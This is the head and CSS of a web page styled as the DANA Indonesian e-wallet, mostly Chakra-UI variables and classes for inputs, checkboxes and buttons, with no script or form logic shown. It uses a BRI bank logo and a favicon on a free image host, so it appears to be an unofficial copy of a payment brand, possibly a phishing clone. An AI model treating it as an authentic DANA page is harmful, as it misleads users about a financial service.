<!DOCTYPE html>
  <head>
    <meta charset="utf-8">
    <meta name="fragment" content="!">
    <meta name="description" content=" ...">
    <link rel="canonical" href="" />
    <meta name="twitter:card" content="DANA" />
    <meta property="og:title" content="DANA" />
    <meta name="twitter:title" content="DANA" />
    <meta property="og:site_name" content="DANA" />
    <meta name="twitter:site_name" content="DANA" />
    <meta property="og:description" content="Dompet digital (e-Wallet) untuk berbagai transaksi non-tunai dan non-kartu" />
    <meta name="twitter:description" content="Dompet digital (e-Wallet) untuk berbagai transaksi non-tunai dan non-kartu" />
        <link rel="image_src" href="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&h=&auto=compress&dpr=1&fit=max" />
    <meta property="og:image" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta name="twitter:image:src" content="https://d1muf25xaso8hp.cloudfront.net/https%3A%2F%2Fs3.amazonaws.com%2Fappforest_uf%2Ff1654819767432x249088519034370100%2Fbri-logo.png?w=&amp;h=&amp;auto=compress&amp;dpr=1&amp;fit=max" />
    <meta property="og:url" content="" />
    	<meta name="theme-color" content="#118EEA">
    <meta property="og:type" content="website" />
    <meta name="apple-mobile-web-app-capable" content="yes">
    <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent" />
    <meta name="viewport" content="width=device-width,initial-scale=1.0, user-scalable=no, minimal-ui">
    </title></title><link rel="icon" type="image/png" href="https://i.ibb.co/Wc61GwP/Frame-1-1.jpg">
<link rel="image_src" href="https://i.ibb.co/Wc61GwP/Frame-1-1.jpg">
    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.0-beta1/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-0evHe/X+R7YkIZDRvuzKMRqM+OrBnVFBL6DOitfPri4tjfHxaWutUpFmBp4vmVor" crossorigin="anonymous">
    <link rel="stylesheet" href="https://code.ionicframework.com/ionicons/2.0.1/css/ionicons.min.css"/>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
      
    <style>
@charset "utf-8";

:host, :root, [data-theme] { --chakra-ring-inset:var(--chakra-empty, ); --chakra-ring-offset-width:0px; --chakra-ring-offset-color:#fff; --chakra-ring-color:rgba(66, 153, 225, 0.6); --chakra-ring-offset-shadow:0 0 #0000; --chakra-ring-shadow:0 0 #0000; --chakra-space-x-reverse:0; --chakra-space-y-reverse:0; --chakra-colors-transparent:transparent; --chakra-colors-current:currentColor; --chakra-colors-black:#000000; --chakra-colors-white:#FFFFFF; --chakra-colors-whiteAlpha-50:rgba(255, 255, 255, 0.04); --chakra-colors-whiteAlpha-100:rgba(255, 255, 255, 0.06); --chakra-colors-whiteAlpha-200:rgba(255, 255, 255, 0.08); --chakra-colors-whiteAlpha-300:rgba(255, 255, 255, 0.16); --chakra-colors-whiteAlpha-400:rgba(255, 255, 255, 0.24); --chakra-colors-whiteAlpha-500:rgba(255, 255, 255, 0.36); --chakra-colors-whiteAlpha-600:rgba(255, 255, 255, 0.48); --chakra-colors-whiteAlpha-700:rgba(255, 255, 255, 0.64); --chakra-colors-whiteAlpha-800:rgba(255, 255, 255, 0.8); --chakra-colors-whiteAlpha-900:rgba(255, 255, 255, 0.92); --chakra-colors-blackAlpha-50:rgba(0, 0, 0, 0.04); --chakra-colors-blackAlpha-100:rgba(0, 0, 0, 0.06); --chakra-colors-blackAlpha-200:rgba(0, 0, 0, 0.08); --chakra-colors-blackAlpha-300:rgba(0, 0, 0, 0.16); --chakra-colors-blackAlpha-400:rgba(0, 0, 0, 0.24); --chakra-colors-blackAlpha-500:rgba(0, 0, 0, 0.36); --chakra-colors-blackAlpha-600:rgba(0, 0, 0, 0.48); --chakra-colors-blackAlpha-700:rgba(0, 0, 0, 0.64); --chakra-colors-blackAlpha-800:rgba(0, 0, 0, 0.8); --chakra-colors-blackAlpha-900:rgba(0, 0, 0, 0.92); --chakra-colors-gray-50:#F7FAFC; --chakra-colors-gray-100:#EDF2F7; --chakra-colors-gray-200:#E2E8F0; --chakra-colors-gray-300:#CBD5E0; --chakra-colors-gray-400:#A0AEC0; --chakra-colors-gray-500:#718096; --chakra-colors-gray-600:#4A5568; --chakra-colors-gray-700:#2D3748; --chakra-colors-gray-800:#1A202C; --chakra-colors-gray-900:#171923; --chakra-colors-red-50:#FFF5F5; --chakra-colors-red-100:#FED7D7; --chakra-colors-red-200:#FEB2B2; --chakra-colors-red-300:#FC8181; --chakra-colors-red-400:#F56565; --chakra-colors-red-500:#E53E3E; --chakra-colors-red-600:#C53030; --chakra-colors-red-700:#9B2C2C; --chakra-colors-red-800:#822727; --chakra-colors-red-900:#63171B; --chakra-colors-orange-50:#FFFAF0; --chakra-colors-orange-100:#FEEBC8; --chakra-colors-orange-200:#FBD38D; --chakra-colors-orange-300:#F6AD55; --chakra-colors-orange-400:#ED8936; --chakra-colors-orange-500:#DD6B20; --chakra-colors-orange-600:#C05621; --chakra-colors-orange-700:#9C4221; --chakra-colors-orange-800:#7B341E; --chakra-colors-orange-900:#652B19; --chakra-colors-yellow-50:#FFFFF0; --chakra-colors-yellow-100:#FEFCBF; --chakra-colors-yellow-200:#FAF089; --chakra-colors-yellow-300:#F6E05E; --chakra-colors-yellow-400:#ECC94B; --chakra-colors-yellow-500:#D69E2E; yaya--chakra-colors-yellow-600:#B7791F; --chakra-colors-yellow-700:#975A16; --chakra-colors-yellow-800:#744210; --chakra-colors-yellow-900:#5F370E; --chakra-colors-green-50:#F0FFF4; --chakra-colors-green-100:#C6F6D5; --chakra-colors-green-200:#9AE6B4; --chakra-colors-green-300:#68D391; --chakra-colors-green-400:#48BB78; --chakra-colors-green-500:#38A169; --chakra-colors-green-600:#2F855A; --chakra-colors-green-700:#276749; --chakra-colors-green-800:#22543D; --chakra-colors-green-900:#1C4532; --chakra-colors-teal-50:#E6FFFA; --chakra-colors-teal-100:#B2F5EA; --chakra-colors-teal-200:#81E6D9; --chakra-colors-teal-300:#4FD1C5; --chakra-colors-teal-400:#38B2AC; --chakra-colors-teal-500:#319795; --chakra-colors-teal-600:#2C7A7B; --chakra-colors-teal-700:#285E61; --chakra-colors-teal-800:#234E52; --chakra-colors-teal-900:#1D4044; --chakra-colors-blue-50:#ebf8ff; --chakra-colors-blue-100:#bee3f8; --chakra-colors-blue-200:#90cdf4; --chakra-colors-blue-300:#63b3ed; --chakra-colors-blue-400:#4299e1; --chakra-colors-blue-500:#3182ce; --chakra-colors-blue-600:#2b6cb0; --chakra-colors-blue-700:#2c5282; --chakra-colors-blue-800:#2a4365; --chakra-colors-blue-900:#1A365D; --chakra-colors-cyan-50:#EDFDFD; --chakra-colors-cyan-100:#C4F1F9; --chakra-colors-cyan-200:#9DECF9; --chakra-colors-cyan-300:#76E4F7; --chakra-colors-cyan-400:#0BC5EA; --chakra-colors-cyan-500:#00B5D8; --chakra-colors-cyan-600:#00A3C4; --chakra-colors-cyan-700:#0987A0; --chakra-colors-cyan-800:#086F83; --chakra-colors-cyan-900:#065666; --chakra-colors-purple-50:#FAF5FF; --chakra-colors-purple-100:#E9D8FD; --chakra-colors-purple-200:#D6BCFA; --chakra-colors-purple-300:#B794F4; --chakra-colors-purple-400:#9F7AEA; --chakra-colors-purple-500:#805AD5; --chakra-colors-purple-600:#6B46C1; --chakra-colors-purple-700:#553C9A; --chakra-colors-purple-800:#44337A; --chakra-colors-purple-900:#322659; --chakra-colors-pink-50:#FFF5F7; --chakra-colors-pink-100:#FED7E2; --chakra-colors-pink-200:#FBB6CE; --chakra-colors-pink-300:#F687B3; --chakra-colors-pink-400:#ED64A6; --chakra-colors-pink-500:#D53F8C; --chakra-colors-pink-600:#B83280; --chakra-colors-pink-700:#97266D; --chakra-colors-pink-800:#702459; --chakra-colors-pink-900:#521B41; --chakra-colors-linkedin-50:#E8F4F9; --chakra-colors-linkedin-100:#CFEDFB; --chakra-colors-linkedin-200:#9BDAF3; --chakra-colors-linkedin-300:#68C7EC; --chakra-colors-linkedin-400:#34B3E4; --chakra-colors-linkedin-500:#00A0DC; --chakra-colors-linkedin-600:#008CC9; --chakra-colors-linkedin-700:#0077B5; --chakra-colors-linkedin-800:#005E93; --chakra-colors-linkedin-900:#004471; --chakra-colors-facebook-50:#E8F4F9; --chakra-colors-facebook-100:#D9DEE9; --chakra-colors-facebook-200:#B7C2DA; --chakra-colors-facebook-300:#6482C0; --chakra-colors-facebook-400:#4267B2; --chakra-colors-facebook-500:#385898; --chakra-colors-facebook-600:#314E89; --chakra-colors-facebook-700:#29487D; --chakra-colors-facebook-800:#223B67; --chakra-colors-facebook-900:#1E355B; --chakra-colors-messenger-50:#D0E6FF; --chakra-colors-messenger-100:#B9DAFF; --chakra-colors-messenger-200:#A2CDFF; --chakra-colors-messenger-300:#7AB8FF; --chakra-colors-messenger-400:#2E90FF; --chakra-colors-messenger-500:#0078FF; --chakra-colors-messenger-600:#0063D1; --chakra-colors-messenger-700:#0052AC; --chakra-colors-messenger-800:#003C7E; --chakra-colors-messenger-900:#002C5C; --chakra-colors-whatsapp-50:#dffeec; --chakra-colors-whatsapp-100:#b9f5d0; --chakra-colors-whatsapp-200:#90edb3; --chakra-colors-whatsapp-300:#65e495; --chakra-colors-whatsapp-400:#3cdd78; --chakra-colors-whatsapp-500:#22c35e; --chakra-colors-whatsapp-600:#179848; --chakra-colors-whatsapp-700:#0c6c33; --chakra-colors-whatsapp-800:#01421c; --chakra-colors-whatsapp-900:#001803; --chakra-colors-twitter-50:#E5F4FD; --chakra-colors-twitter-100:#C8E9FB; --chakra-colors-twitter-200:#A8DCFA; --chakra-colors-twitter-300:#83CDF7; --chakra-colors-twitter-400:#57BBF5; --chakra-colors-twitter-500:#1DA1F2; --chakra-colors-twitter-600:#1A94DA; --chakra-colors-twitter-700:#1681BF; --chakra-colors-twitter-800:#136B9E; --chakra-colors-twitter-900:#0D4D71; --chakra-colors-telegram-50:#E3F2F9; --chakra-colors-telegram-100:#C5E4F3; --chakra-colors-telegram-200:#A2D4EC; --chakra-colors-telegram-300:#7AC1E4; --chakra-colors-telegram-400:#47A9DA; --chakra-colors-telegram-500:#0088CC; --chakra-colors-telegram-600:#007AB8; --chakra-colors-telegram-700:#006BA1; --chakra-colors-telegram-800:#005885; --chakra-colors-telegram-900:#003F5E; --chakra-borders-none:0; --chakra-borders-1px:1px solid; --chakra-borders-2px:2px solid; --chakra-borders-4px:4px solid; --chakra-borders-8px:8px solid; --chakra-fonts-heading:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol"; --chakra-fonts-body:-apple-system,BlinkMacSystemFont,"Segoe UI",Helvetica,Arial,sans-serif,"Apple Color Emoji","Segoe UI Emoji","Segoe UI Symbol"; --chakra-fonts-mono:SFMono-Regular,Menlo,Monaco,Consolas,"Liberation Mono","Courier New",monospace; --chakra-fontSizes-xs:0.75rem; --chakra-fontSizes-sm:0.875rem; --chakra-fontSizes-md:1rem; --chakra-fontSizes-lg:1.125rem; --chakra-fontSizes-xl:1.25rem; --chakra-fontSizes-2xl:1.5rem; --chakra-fontSizes-3xl:1.875rem; --chakra-fontSizes-4xl:2.25rem; --chakra-fontSizes-5xl:3rem; --chakra-fontSizes-6xl:3.75rem; --chakra-fontSizes-7xl:4.5rem; --chakra-fontSizes-8xl:6rem; --chakra-fontSizes-9xl:8rem; --chakra-fontWeights-hairline:100; --chakra-fontWeights-thin:200; --chakra-fontWeights-light:300; --chakra-fontWeights-normal:400; --chakra-fontWeights-medium:500; --chakra-fontWeights-semibold:600; --chakra-fontWeights-bold:700; --chakra-fontWeights-extrabold:800; --chakra-fontWeights-black:900; --chakra-letterSpacings-tighter:-0.05em; --chakra-letterSpacings-tight:-0.025em; --chakra-letterSpacings-normal:0; --chakra-letterSpacings-wide:0.025em; --chakra-letterSpacings-wider:0.05em; --chakra-letterSpacings-widest:0.1em; --chakra-lineHeights-3:0.75rem; --chakra-lineHeights-4:1rem; --chakra-lineHeights-5:1.25rem; --chakra-lineHeights-6:1.5rem; --chakra-lineHeights-7:1.75rem; --chakra-lineHeights-8:2rem; --chakra-lineHeights-9:2.25rem; --chakra-lineHeights-10:2.5rem; --chakra-lineHeights-normal:normal; --chakra-lineHeights-none:1; --chakra-lineHeights-shorter:1.25; --chakra-lineHeights-short:1.375; --chakra-lineHeights-base:1.5; --chakra-lineHeights-tall:1.625; --chakra-lineHeights-taller:2; --chakra-radii-none:0; --chakra-radii-sm:0.125rem; --chakra-radii-base:0.25rem; --chakra-radii-md:0.375rem; --chakra-radii-lg:0.5rem; --chakra-radii-xl:0.75rem; --chakra-radii-2xl:1rem; --chakra-radii-3xl:1.5rem; --chakra-radii-full:9999px; --chakra-space-1:0.25rem; --chakra-space-2:0.5rem; --chakra-space-3:0.75rem; --chakra-space-4:1rem; --chakra-space-5:1.25rem; --chakra-space-6:1.5rem; --chakra-space-7:1.75rem; --chakra-space-8:2rem; --chakra-space-9:2.25rem; --chakra-space-10:2.5rem; --chakra-space-12:3rem; --chakra-space-14:3.5rem; --chakra-space-16:4rem; --chakra-space-20:5rem; --chakra-space-24:6rem; --chakra-space-28:7rem; --chakra-space-32:8rem; --chakra-space-36:9rem; --chakra-space-40:10rem; --chakra-space-44:11rem; --chakra-space-48:12rem; --chakra-space-52:13rem; --chakra-space-56:14rem; --chakra-space-60:15rem; --chakra-space-64:16rem; --chakra-space-72:18rem; --chakra-space-80:20rem; --chakra-space-96:24rem; --chakra-space-px:1px; --chakra-space-0-5:0.125rem; --chakra-space-1-5:0.375rem; --chakra-space-2-5:0.625rem; --chakra-space-3-5:0.875rem; --chakra-shadows-xs:0 0 0 1px rgba(0, 0, 0, 0.05); --chakra-shadows-sm:0 1px 2px 0 rgba(0, 0, 0, 0.05); --chakra-shadows-base:0 1px 3px 0 rgba(0, 0, 0, 0.1),0 1px 2px 0 rgba(0, 0, 0, 0.06); --chakra-shadows-md:0 4px 6px -1px rgba(0, 0, 0, 0.1),0 2px 4px -1px rgba(0, 0, 0, 0.06); --chakra-shadows-lg:0 10px 15px -3px rgba(0, 0, 0, 0.1),0 4px 6px -2px rgba(0, 0, 0, 0.05); --chakra-shadows-xl:0 20px 25px -5px rgba(0, 0, 0, 0.1),0 10px 10px -5px rgba(0, 0, 0, 0.04); --chakra-shadows-2xl:0 25px 50px -12px rgba(0, 0, 0, 0.25); --chakra-shadows-outline:0 0 0 3px rgba(66, 153, 225, 0.6); --chakra-shadows-inner:inset 0 2px 4px 0 rgba(0,0,0,0.06); --chakra-shadows-none:none; --chakra-shadows-dark-lg:rgba(0, 0, 0, 0.1) 0px 0px 0px 1px,rgba(0, 0, 0, 0.2) 0px 5px 10px,rgba(0, 0, 0, 0.4) 0px 15px 40px; --chakra-sizes-1:0.25rem; --chakra-sizes-2:0.5rem; --chakra-sizes-3:0.75rem; --chakra-sizes-4:1rem; --chakra-sizes-5:1.25rem; --chakra-sizes-6:1.5rem; --chakra-sizes-7:1.75rem; --chakra-sizes-8:2rem; --chakra-sizes-9:2.25rem; --chakra-sizes-10:2.5rem; --chakra-sizes-12:3rem; --chakra-sizes-14:3.5rem; --chakra-sizes-16:4rem; --chakra-sizes-20:5rem; --chakra-sizes-24:6rem; --chakra-sizes-28:7rem; --chakra-sizes-32:8rem; --chakra-sizes-36:9rem; --chakra-sizes-40:10rem; --chakra-sizes-44:11rem; --chakra-sizes-48:12rem; --chakra-sizes-52:13rem; --chakra-sizes-56:14rem; --chakra-sizes-60:15rem; --chakra-sizes-64:16rem; --chakra-sizes-72:18rem; --chakra-sizes-80:20rem; --chakra-sizes-96:24rem; --chakra-sizes-px:1px; --chakra-sizes-0-5:0.125rem; --chakra-sizes-1-5:0.375rem; --chakra-sizes-2-5:0.625rem; --chakra-sizes-3-5:0.875rem; --chakra-sizes-max:max-content; --chakra-sizes-min:min-content; --chakra-sizes-full:100%; --chakra-sizes-3xs:14rem; --chakra-sizes-2xs:16rem; --chakra-sizes-xs:20rem; --chakra-sizes-sm:24rem; --chakra-sizes-md:28rem; --chakra-sizes-lg:32rem; --chakra-sizes-xl:36rem; --chakra-sizes-2xl:42rem; --chakra-sizes-3xl:48rem; --chakra-sizes-4xl:56rem; --chakra-sizes-5xl:64rem; --chakra-sizes-6xl:72rem; --chakra-sizes-7xl:80rem; --chakra-sizes-8xl:90rem; --chakra-sizes-container-sm:640px; --chakra-sizes-container-md:768px; --chakra-sizes-container-lg:1024px; --chakra-sizes-container-xl:1280px; --chakra-zIndices-hide:-1; --chakra-zIndices-auto:auto; --chakra-zIndices-base:0; --chakra-zIndices-docked:10; --chakra-zIndices-dropdown:1000; --chakra-zIndices-sticky:1100; --chakra-zIndices-banner:1200; --chakra-zIndices-overlay:1300; --chakra-zIndices-modal:1400; --chakra-zIndices-popover:1500; --chakra-zIndices-skipLink:1600; --chakra-zIndices-toast:1700; --chakra-zIndices-tooltip:1800; --chakra-transition-property-common:background-color,border-color,color,fill,stroke,opacity,box-shadow,transform; --chakra-transition-property-colors:background-color,border-color,color,fill,stroke; --chakra-transition-property-dimensions:width,height; --chakra-transition-property-position:left,right,top,bottom; --chakra-transition-property-background:background-color,background-image,background-position; --chakra-transition-easing-ease-in:cubic-bezier(0.4, 0, 1, 1); --chakra-transition-easing-ease-out:cubic-bezier(0, 0, 0.2, 1); --chakra-transition-easing-ease-in-out:cubic-bezier(0.4, 0, 0.2, 1); --chakra-transition-duration-ultra-fast:50ms; --chakra-transition-duration-faster:100ms; --chakra-transition-duration-fast:150ms; --chakra-transition-duration-normal:200ms; --chakra-transition-duration-slow:300ms; --chakra-transition-duration-slower:400ms; --chakra-transition-duration-ultra-slow:500ms; --chakra-blur-none:0; --chakra-blur-sm:4px; --chakra-blur-base:8px; --chakra-blur-md:12px; --chakra-blur-lg:16px; --chakra-blur-xl:24px; --chakra-blur-2xl:40px; --chakra-blur-3xl:64px; }
</style>

<style>
.chakra-ui-light :host:not([data-theme]), .chakra-ui-light :root:not([data-theme]), .chakra-ui-light [data-theme]:not([data-theme]), [data-theme="light"] :host:not([data-theme]), [data-theme="light"] :root:not([data-theme]), [data-theme="light"] [data-theme]:not([data-theme]), :host[data-theme="light"], :root[data-theme="light"], [data-theme][data-theme="light"] { --chakra-colors-chakra-body-text:var(--chakra-colors-gray-800); --chakra-colors-chakra-body-bg:var(--chakra-colors-white); --chakra-colors-chakra-border-color:var(--chakra-colors-gray-200); --chakra-colors-chakra-placeholder-color:var(--chakra-colors-gray-500); }

.chakra-ui-dark :host:not([data-theme]), .chakra-ui-dark :root:not([data-theme]), .chakra-ui-dark [data-theme]:not([data-theme]), [data-theme="dark"] :host:not([data-theme]), [data-theme="dark"] :root:not([data-theme]), [data-theme="dark"] [data-theme]:not([data-theme]), :host[data-theme="dark"], :root[data-theme="dark"], [data-theme][data-theme="dark"] { --chakra-colors-chakra-body-text:var(--chakra-colors-whiteAlpha-900); --chakra-colors-chakra-body-bg:var(--chakra-colors-gray-800); --chakra-colors-chakra-border-color:var(--chakra-colors-whiteAlpha-300); --chakra-colors-chakra-placeholder-color:var(--chakra-colors-whiteAlpha-400); }
</style>

<style>

@charset "utf-8";

html { line-height: 1.5; text-size-adjust: 100%; font-family: system-ui, sans-serif; -webkit-font-smoothing: antialiased; text-rendering: optimizelegibility; touch-action: manipulation; }


*, ::before, ::after { border-width: 0px; border-style: solid; box-sizing: border-box; }

main { display: block; }

hr { border-top-width: 1px; box-sizing: content-box; height: 0px; overflow: visible; }

pre, code, kbd, samp { font-family: SFMono-Regular, Menlo, Monaco, Consolas, monospace; font-size: 1em; }

a { background-color: transparent; color: inherit; text-decoration: inherit; }

abbr[title] { border-bottom: none; text-decoration: underline dotted; }

b, strong { font-weight: bold; font-size: 12px;  color: rgb(255, 255, 255);  }

small { font-size: 80%; }

sub, sup { font-size: 75%; line-height: 0; position: relative; vertical-align: baseline; }

sub { bottom: -0.25em; }

sup { top: -0.5em; }

img { border-style: none; }

button, input, optgroup, select, textarea { font-family: inherit; font-size: 100%; line-height: 1.15; margin: 0px; }

button, input { overflow: visible; }

button, select { text-transform: none; }

fieldset { padding: 0.35em 0.75em 0.625em; }

legend { box-sizing: border-box; color: inherit; display: table; max-width: 100%; padding: 0px; white-space: normal; }

progress { vertical-align: baseline; }

textarea { overflow: auto; }

[type="checkbox"], [type="radio"] { box-sizing: border-box; padding: 0px; }

[type="number"]::-webkit-inner-spin-button, [type="number"]::-webkit-outer-spin-button { appearance: none !important; }

input[type="number"] { }

[type="search"] { appearance: textfield; outline-offset: -2px; }

[type="search"]::-webkit-search-decoration { appearance: none !important; }

::-webkit-file-upload-button { appearance: button; font: inherit; }

details { display: block; }

summary { display: list-item; }

template { display: none; }

[hidden] { display: none !important; }

body, blockquote, dl, dd, h1, h2, h3, h4, h5, h6, hr, figure, p, pre { margin: 0px; }

button { background: transparent; padding: 0px; }

fieldset { margin: 0px; padding: 0px; }

ol, ul { margin: 0px; padding: 0px; }

textarea { resize: vertical; }

button, [role="button"] { cursor: pointer; }

table { border-collapse: collapse; }

h1, h2, h3, h4, h5, h6 { font-size: inherit; font-weight: inherit; }

button, input, optgroup, select, textarea { padding: 0px; line-height: inherit; color: inherit; }

img, svg, video, canvas, audio, iframe, embed, object { display: block; }

img, video { max-width: 100%; height: auto; }

[data-js-focus-visible] :focus:not([data-focus-visible-added]):not([data-focus-visible-disabled]) { outline: none; box-shadow: none; }
</style>
<style>

@charset "utf-8";

body {
    width: 100%;
    height: 100vh;
    margin: 0;
    padding: 0;
    background-color: #118EEA;
    overflow: hidden;}
     }

::-webkit-input-placeholder { color: 
    font-weight:bold;
    font-size: 19px;
    color: #bebebe; }

::placeholder {
    font-weight: 550;
    font-size: 21px;
    color: #bebebe;
}

*, ::before, ::after { border-color: var(--chakra-colors-chakra-border-color); overflow-wrap: break-word; }
</style>
<style>

@charset "utf-8";

.css-536van { border-color: rgb(14, 120, 202); max-width: 500px; margin: auto; overflow: hidden; height: 100%; }
</style>
<style>

@charset "utf-8";

.css-1kh160d { background-color: rgb(14, 120, 202); position: fixed; inset: 0px; display: flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; z-index: 9; }

.css-v7v99c { width: 100px; }

.css-otdls7 { background-color: rgb(14, 120, 202); height: 100%; display: flex; flex-direction: column; }

.css-m25hbt { background-color: white; padding: 10px 20px; }

.css-r8xns0 { height: 27px; }

.css-6icz3w { width: 100%; height: 170px; }

.css-1h7se0k { text-align: center; flex: 1 1 0%; }

.css-k9xuz5 { margin: 0px auto; }

.css-140rqgf { text-align: left; padding: 10px 20px; margin-bottom: 18px; }

.css-14zpys6 { font-weight: 700; color: var(--chakra-colors-blue-500); font-size: var(--chakra-fontSizes-xl); text-align: center; }

.css-1gu96id { margin-bottom: 20px; font-weight: 600; color: var(--chakra-colors-blue-500); font-size: var(--chakra-fontSizes-sm); text-align: center; }

.css-1jnktsq { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-blue-500); font-weight: var(--chakra-fontWeights-bold); }

.css-1jnktsq[disabled], .css-1jnktsq[aria-disabled="true"], .css-1jnktsq[data-disabled] { cursor: not-allowed; }

.css-1ncbew8 { width: var(--chakra-sizes-4); transition-property: box-shadow; transition-duration: var(--chakra-transition-duration-normal); border-width: 2px; border-style: solid; border-image: initial; border-radius: var(--chakra-radii-sm); border-color: inherit; color: var(--chakra-colors-white); height: var(--chakra-sizes-4); display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; vertical-align: top; user-select: none; flex-shrink: 0; }

.css-1ncbew8[aria-checked="true"], .css-1ncbew8[data-checked] { background: var(--chakra-colors-blue-500); border-color: var(--chakra-colors-blue-500); color: var(--chakra-colors-white); }

.css-1ncbew8[aria-checked="true"]:hover, .css-1ncbew8[data-checked]:hover, .css-1ncbew8[aria-checked="true"][data-hover], .css-1ncbew8[data-checked][data-hover] { background: var(--chakra-colors-blue-600); border-color: var(--chakra-colors-blue-600); }

.css-1ncbew8[aria-checked="true"][disabled], .css-1ncbew8[data-checked][disabled], .css-1ncbew8[aria-checked="true"][aria-disabled="true"], .css-1ncbew8[data-checked][aria-disabled="true"], .css-1ncbew8[aria-checked="true"][data-disabled], .css-1ncbew8[data-checked][data-disabled] { border-color: var(--chakra-colors-gray-200); background: var(--chakra-colors-gray-200); color: var(--chakra-colors-gray-500); }

.css-1ncbew8:indeterminate, .css-1ncbew8[aria-checked="mixed"], .css-1ncbew8[data-indeterminate] { background: var(--chakra-colors-blue-500); border-color: var(--chakra-colors-blue-500); color: var(--chakra-colors-white); }

.css-1ncbew8[disabled], .css-1ncbew8[aria-disabled="true"], .css-1ncbew8[data-disabled] { background: var(--chakra-colors-gray-100); border-color: var(--chakra-colors-gray-100); }

.css-1ncbew8:focus-visible, .css-1ncbew8[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-1ncbew8[aria-invalid="true"], .css-1ncbew8[data-invalid] { border-color: var(--chakra-colors-red-500); }

.css-1sgc0qu { margin-inline-start: 0.5rem; user-select: none; font-size: var(--chakra-fontSizes-md); }

.css-1sgc0qu[disabled], .css-1sgc0qu[aria-disabled="true"], .css-1sgc0qu[data-disabled] { opacity: 0.4; }

.css-1tqjkcb { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-blue-500); font-weight: var(--chakra-fontWeights-bold); margin-bottom: 20px; }

.css-1tqjkcb[disabled], .css-1tqjkcb[aria-disabled="true"], .css-1tqjkcb[data-disabled] { cursor: not-allowed; }

.css-jgamys { font-size: 12px; text-align: center; color: rgb(14, 120, 202); font-weight: 700; }

.css-g9qnka { padding: 0px 20px; }

.css-q9238k { display: inline-flex; appearance: none; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; user-select: none; position: relative; white-space: nowrap; vertical-align: middle; outline: transparent solid 2px; outline-offset: 2px; line-height: 1.2; border-radius: var(--chakra-radii-full); font-weight: var(--chakra-fontWeights-semibold); transition-property: var(--chakra-transition-property-common); transition-duration: var(--chakra-transition-duration-normal); height: var(--chakra-sizes-10); min-width: var(--chakra-sizes-10); font-size: var(--chakra-fontSizes-md); padding-inline-start: var(--chakra-space-4); padding-inline-end: var(--chakra-space-4); background: var(--chakra-colors-blue-500); color: var(--chakra-colors-white); width: var(--chakra-sizes-full); margin-top: 32px; }

.css-q9238k:focus-visible, .css-q9238k[data-focus-visible] { box-shadow: var(--chakra-shadows-outline); }

.css-q9238k[disabled], .css-q9238k[aria-disabled="true"], .css-q9238k[data-disabled] { opacity: 0.4; cursor: not-allowed; box-shadow: var(--chakra-shadows-none); }

.css-q9238k:hover, .css-q9238k[data-hover] { background: var(--chakra-colors-blue-600); }

.css-q9238k:hover[disabled], .css-q9238k[data-hover][disabled], .css-q9238k:hover[aria-disabled="true"], .css-q9238k[data-hover][aria-disabled="true"], .css-q9238k:hover[data-disabled], .css-q9238k[data-hover][data-disabled] { background: var(--chakra-colors-blue-500); }

.css-q9238k:active, .css-q9238k[data-active] { background: rgb(14, 120, 202);; }

.css-129zm1u { font-weight: 700; font-size: var(--chakra-fontSizes-sm); text-align: center; }

.css-dnzamn { display: flex; -webkit-box-pack: center; justify-content: center; margin: 20px 0px; }

.css-1eqmq6c { width: 70px; }

.css-1hfq88p { background-color: rgb(45, 120, 189); padding: 10px; }

.css-dz67t0 { font-size: 11px; text-align: center; color: var(--chakra-colors-white); }

.css-k18gpu { cursor: pointer; display: inline-flex; -webkit-box-align: center; align-items: center; vertical-align: top; position: relative; border-color: var(--chakra-colors-blackAlpha-400); color: var(--chakra-colors-red-500); font-weight: var(--chakra-fontWeights-bold); }

.css-k18gpu[disabled], .css-k18gpu[aria-disabled="true"], .css-k18gpu[data-disabled] { cursor: not-allowed; }

.css-15rtx21 { width: var(--chakra-sizes-4); transition-property: box-shadow; transition-duration: var(--chakra-transition-duration-normal); border-width: 2px; border-style: solid; border-image: initial; border-radius: var(--chakra-radii-sm); border-color: inherit; color: var(--chakra-colors-white); height: var(--chakra-sizes-4); display: inline-flex; -webkit-box-align: center; align-items: center; -webkit-box-pack: center; justify-content: center; vertical-align: top; user-select: none; flex-shrink: 0; }

.css-15rtx21[aria-checked="true"], .css-15rtx21[data-checked] { background: var(--chakra-colors-red-500); border-color: var(--chakra-colors-red-500); color: var(--chakra-colors-white); }

.css-15rtx21[aria-checked="true"]:hover, .css-15rtx21[data-checked]:hover, .css-15rtx21[aria-checked="true"][data-hover], .css-15rtx21[data-checked][data-hover] { background: var(--chakra-colors-red-600); border-color: var(--chakra-colors-red-600); }

.css-15rtx21[aria-checked="true"][disabled], .css-15rtx21[data-checked][disabled], .css-15rtx21[aria-checked="true"][aria-disabled="true"], .css-15rtx21[data-checked][aria-disabled="true"], .css-15rtx21[aria-checked="true"][data-disabled], .css-15rtx21[data-checked][data-disabled] { border-color: var(--chakra-colors-gray-200); background: var(--chakra-colors-gray-200); color: var(--chakra-colors-gray-500); }

.css-15rtx21:indeterminate, .css-15rtx21[aria-checked="mixed"], .css-15rtx21[data-indeterminate] { background: var(--chakra-colors-red-500); border-color: var(--chakra-colors-red-500); color: var(--chakra-colors-white); }

